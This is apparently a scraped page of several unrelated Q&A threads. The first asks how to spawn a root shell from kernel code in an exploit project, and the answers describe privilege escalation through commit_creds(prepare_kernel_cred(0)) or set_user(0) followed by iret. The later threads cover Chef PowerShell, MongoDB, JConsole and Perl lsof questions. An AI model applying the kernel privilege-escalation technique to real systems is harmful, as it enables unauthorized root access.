I am working on a exploit project which needs me to invoke a root shell from within the kernel. After searching through various documents and websites, I came to know that the only way to do that is to elevate the current process to root privileges and then execute instructions to invoke shell. This is because we cannot simply invoke a system call from kernel.
For the same, I have come across the call commit_creds (prepare_kernel_cred (0));, which can be used to grant root privilege to the process. However, I am using Red Hat Enterprise Linux 4.4 Base and it does not have the above call:
[dmazumd#bn19-62 ~]$ grep commit_cred /proc/kallsyms
[dmazumd#bn19-62 ~]$ grep _cred /proc/kallsyms
c0164655 T compute_creds
c01a7cdd t dummy_bprm_apply_creds.....
So, my question is, how to go about this?
I understand that the need is to set the uid of the process to zero which will provide it root privileges. AFAIK, the uid resides in struct_cred rather than struct_task now. And I am unaware if I can directly access these structures without the use of any API as mentioned above. Is there any other call to achieve the same? Or, is there any other approach?
PS: I am not asking for the exact answer to my question, any direction/help would be appreciated.
To clarify things: Your kernel does not need 'root privileges'. It is actually above that. What you need is a process which can have privileges.
You could start looking what execve does to launch a process and do that.
If you've already a shell running AND you're in kernel mode, you could simply modify the uid in the task_struct (shed.h).
Also, take a look here.
I could finally achieve root shell by first elevating the process to root status while inside kernel. This was achieved by using the call set_user(0) call which is defined inside /proc/kallsyms.
Once this is done, the process switches back to user space using iret and then spawns a shell. This shell has root privileges.
Related
I have powershell script which is present on chef server to run on remote windows server, how can i run this powershell script from chef server on remote windows server.
Chef doesn't do anything like this. First, Chef Server can never remotely access servers directly, all it does is stores data. Second, Chef doesn't really do "run a thing in a place right now". We offer workstation tools like knife ssh and knife winrm as simplistic wrappers but they aren't made for anything complex. The Chef-y way to do this would be to make a recipe and run your script using the the powershell_script resource.
Does it mean chef is also running on Windows server ?
If yes, why not to use psexec from Windows Ps tools ?
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
Here is my understanding of what you are trying to achieve. If I'm wrong then please correct me in a comment and I will update my answer.
You have a powershell script that you need to run on a specific server or set of servers.
It would be convenient to have a central management solution for running this script instead of logging into each server and running it manually.
Ergo you either need to run this script in many places when a condition isn't filled, such as a file is missing, or you need to run this script often, or you need this script to be run with a certain timing in regards to other processes you have going on.
Without knowing precisely what you're trying to achieve with your script the best solution I know of is to write a cookbook and do one of the following
If your script is complex place it in your cookbook/files folder (assuming the script will be identical on all computers it runs on) or in your cookbook/templates folder (if you will need to inject information into it at write time). You can then write the .ps file to the local computer during a Chef converge with the following code snippet. After you write it to disk you will also have to call it with one of the commands in the next bullet.
Monomorphic file:
cookbook_file '<destination>' do
source '<filename.ps>'
<other options>
end
Options can be found at https://docs.chef.io/resource_cookbook_file.html
Polymorphic file:
template '<destination>' do
source '<template.ps.erb>'
variables {<hash of variables and values>}
<other options>
end
Options can be found at https://docs.chef.io/resource_template.html
If your script is a simple one-liner you can instead use powershell_script, powershell_out! or execute. powershell_out! has all the same options and features as the shell_out! command and the added advantage that your converge will pause until it receives an exit status for the command, if that is desirable. The documentation on using it is a bit more spotty though so spend time experimenting with it and googling.
https://docs.chef.io/resource_powershell_script.html
https://docs.chef.io/resource_execute.html
Which ever option you end up going with you will probably want to guard your resource with conditions on when it should not run, such as when a file already exists, a registry key is set or what ever else your script changes that you can use. If you truly want the script to execute every single converge then you can skip this step, but that is a code smell and I urge you to reconsider your plans.
https://docs.chef.io/resource_common.html#guards
It's important to note that this is not an exhaustive list of how to run a powershell script on your nodes, just a collection of common patterns I've seen.
Hope this helped.
I am encountering several situations where, in a Chef recipe with powershell_scipt, a command appears to fail, whereas if I run the same command in powershell outside of Chef, the same command works.
The two in particular are "regedit", which I am trying to use to set a key for app compatibility and the other is "net use z:...." to created a mapped drive. Both of these seem to work fine if I run them in powershell, but if I use them inside a recipe inside powershell_script, they don't appear to do anything.
So I'm wondering is this because Chef runs commands that are inside powershell_script at some lower privilege level?
Also if so, how do I change it so that the regedit and net use would work?
Thanks,
Jim
EDIT 1: This seems to work for adding the registry entry I needed:
registry_key "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags" do
values [{
:name => "{2b9034f3-b661-4d36-a5ef-60ab5a711ace}",
:type => :dword,
:data => 00000004
}]
action :create
end
That prevents the compatability popup that I am getting when we run the Sharepoint installer.
EDIT 2: I hope that this is ok, but for the record and more visibility and hope that I remember this, I found this re. mapping drives in Windows and Chef:
Mount windows shares on a windows node with Chef
and:
https://tickets.opscode.com/browse/CHEF-1267
I haven't tried that yet, but that seems like the answer to my drive mapping need.... hopefully..
The chef client service runs as Local System (SYSTEM) by default.
In Windows, that user has full privileges on the local system, like root basically, but on the network it authenticates as the computer object.
So it you are trying to use regedit to change something in for example HKEY_CURRENT_USER then you need to remember that the code will not see the same "current user" as you will when you run it in interactively. Also, regedit is an .exe; you should really do what you need through the PowerShell providers or .Net objects.
For net use you are trying to map a drive. It's likely that the computer account doesn't have the rights to the share that your user has. Again, net.exe is a separate executable. net use maps a drive to a drive letter (usually) and you shouldn't be doing that in a configuration script, in my opinion. You should access the UNC path directly, but either way I still think that you're probably running into a permissions issue here.
You could change the credentials of the service to use a user account that has all the rights you want, but before doing something like that you should consider changing your workflow to not need that.
Does MongoDB create a file I can poll for in order to determine when prealloc is done? Right now I have a script to run rs.init(..config..), but I need to wait with triggering it until mongod is up and running.
Since tail -f | grep .. | xarg.. the log file is a bit of a flaky hack, I wondered if there is any other way to determine that mongod is done with prealloc?
We have the same problem for testing replica sets with the PHP driver. Here we use the mongo shell's ReplSetTest() functionality to get around this. You can see here how that works:
https://github.com/mongodb/mongo-php-driver/blob/master/tests/utils/myconfig.js#L9
However, I am not sure how well this works for non-test environments as the amount of options you can give are rather limited (such as, you can't set a data dir properly as things are hardcoded). All the functions and code for this is all in JavaScript at https://github.com/mongodb/mongo/blob/master/src/mongo/shell/replsettest.js — this should give you an overview how it works and allows you to rewrite it in your preferred language.
try to use inotify (i am not sure exactly), for example, if it is necessary to determine that the file is closed after writing:
[maverick#mutabor ~]$ pyinotify -e IN_CLOSE_WRITE /tmp/testfile
I tried to run JConsole to analyze the memory used by a running process, but JConsole doesn't show me processes even though I am absolutely sure that one is running (in addition to that it should show JConsole in the process list as well but it doesn't).
Does anyone have an idea why it doesn't show any processes?
Cheers
at window prompt, run echo %TMP%, it will give you default temp dir. Go to that directory and find directory named hsperfdata_user where user is your login. This is directory to store your process id. Any new process you created such as java application will have a new file named by process id. Jconsole will pick up the process ids from this directory. If you cannot create a file in this directory, that means you need change permission to allow write. Once done that, start a new java application to see if new process id file is in the dir. Once confirmed, start jconsole
I have the same problem. But if I explicitly specify the PID, as in jconsole 1234, jconsole is able to analyze the process.
If you are running jconsole on windows - simply :
Find jconsole.exe
Right click it
Select run as administrator.
In my case, removal of hsperfdata_USERNAME directory (in %TMP% directory) and closing all the JVMs has helped.
This happens when %TMP% value is different for monitored JVM and the monitoring tool (JConsole/JMC/Java Mission Control, maybe even VisualVM).
This may be the standard scenario with Cygwin (at least in my case: Cygwin+Babun)
Easiest solution is to set value of the TMP environment variable to the default value used by Windows, at least in scope of shell launching the JVM.
You have to start jconsole with the same user as the process you want to analyze is started by.
Just ran into this issue
If you are using multiple jdk's by any chance (ex. SDKMAN), then make sure that jconsole is run using the same jdk as the application
8 years later... I had the same problem. I could only see certain processes but couldn't see and monitor any java processes running in a docker container in Linux.
Inspired by the Windows solution by RoyalBigMack:
Solution 1. Run terminal as super user (su command) and run jconsole
Solution 2. Run solution 1 as one command, sudo jconsole
Only the first solution worked for me, and once the jconsole UI popped up- all the hidden processes were now visible.
I have a shell script which archives log files based on the whether the process is running or not. If the log file is not used by the process then I archive it. Until now, I'm using lsof to get the log file being used but in future, I have decided to use perl to do this function.
Is there a perl module similar to what lsof in linux can perform ?
There is a perl module, which wraps around lsof. See Unix::Lsof.
As I see it, the big problem with not using lsof is that one would need to work in a way that is independent of the operating system. Using lsof allows the perl programmer to work with a consistent application allowing for operating system independence.
To have a perl module developer to write lsof would, in effect, be writing lsof as a library and then link that into perl - which is much more work than just using the existing binary.
One could also use the fuser command, which shows the process IDs with the file handle. There is also a module which seeks to implement the same functionality. Note from the perldoc:
The way that this works is highly unlikely to work on any other OS
other than Linux and even then it may not work on other than 2.2.*
kernels.
One might try walking /proc/*/fd and looking at the file descriptors in there to see if any are pointing to the file in question. If it is known what the process ID of a running process that would be opening the log file, it would be just as easy to look at that process. Note, that this is how the fuser module works.
That said, it should be asked "why do you want to move away from lsof"?